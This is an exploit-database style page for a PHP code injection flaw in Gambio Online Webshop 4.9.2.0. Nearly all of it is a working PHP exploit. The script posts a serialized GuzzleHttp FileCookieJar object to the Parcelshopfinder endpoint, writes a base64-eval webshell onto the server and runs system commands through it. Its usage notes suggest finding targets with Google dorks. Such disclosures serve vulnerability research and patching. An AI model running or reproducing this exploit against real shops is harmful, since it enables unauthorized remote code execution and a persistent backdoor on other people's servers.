Security
Headlines
HeadlinesLatestCVEs

Headline

Gambio Online Webshop 4.9.2.0 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

Packet Storm
#vulnerability#web#windows#google#php#auth#firefox
=============================================================================================================================================| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gambio.com/                                                                                                     |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit {    private $targetUrl;    private $webshellName;    private $postParam;    private $getParam;    private $phpCmdFunction;    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {        $this->targetUrl = $targetUrl;        $this->phpCmdFunction = $phpCmdFunction;        $this->webshellName = $webshellName ?: $this->randomString() . '.php';        $this->postParam = $this->randomString();        $this->getParam = $this->randomString();    }    // Random string generator    private function randomString($length = 8) {        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    // Function to send HTTP POST request    private function sendPostRequest($uri, $data) {        $url = $this->targetUrl . $uri;        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => http_build_query($data),            ],        ];        $context = stream_context_create($options);        return file_get_contents($url, false, $context);    }    // Upload webshell to target    public function uploadWebshell() {        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $finalPayload = base64_encode(serialize([            "GuzzleHttp\\Cookie\\FileCookieJar" => [                "cookies" => [                    "GuzzleHttp\\Cookie\\SetCookie" => [                        "data" => [                            "Value" => $phpPayload,                            "Domain" => "target.com",                            "Path" => "/",                        ]                    ]                ],                "filename" => $this->webshellName            ]        ]));        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [            'checkout_started' => 0,            'search' => $finalPayload,            'firstname' => 'test',            'lastname' => 'test',        ]);        echo "Webshell uploaded to: {$this->webshellName}\n";    }    // Execute PHP payload    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}", [            $this->postParam => $payload        ]);        echo "Executed command via webshell: {$cmd}\n";    }    // Execute command    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [            $this->postParam => $payload        ]);        echo "Executed command: {$cmd}\n";    }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution